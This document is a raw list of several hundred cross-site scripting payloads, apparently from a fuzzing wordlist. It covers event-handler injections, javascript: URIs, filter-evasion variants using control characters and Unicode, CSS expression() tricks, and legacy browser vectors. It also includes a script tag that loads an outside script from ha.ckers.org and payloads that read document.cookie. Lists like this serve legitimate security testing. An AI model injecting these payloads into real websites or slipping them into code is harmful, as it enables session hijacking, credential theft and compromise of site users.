<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml
onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet
onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet
onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->
-->
-->
-->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>..
.<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br
><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test
onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction
actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction>
</math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%
%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="`ònmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">


<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)"
style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo
;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:expression(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9
AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/
script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=ùrn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)`
attributename=ìnnerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)
attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute;width:100%;height:100%
src=%(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white
strokeweight=1000px from=0 to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss"
datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-
stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t"
implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML
ID="xss"><I><B><IMG SRC="javascript:javascript:alert(1)"></B></I></XML><SPAN
DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT
DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br
><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><
br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="&LT;iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&
amp;gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
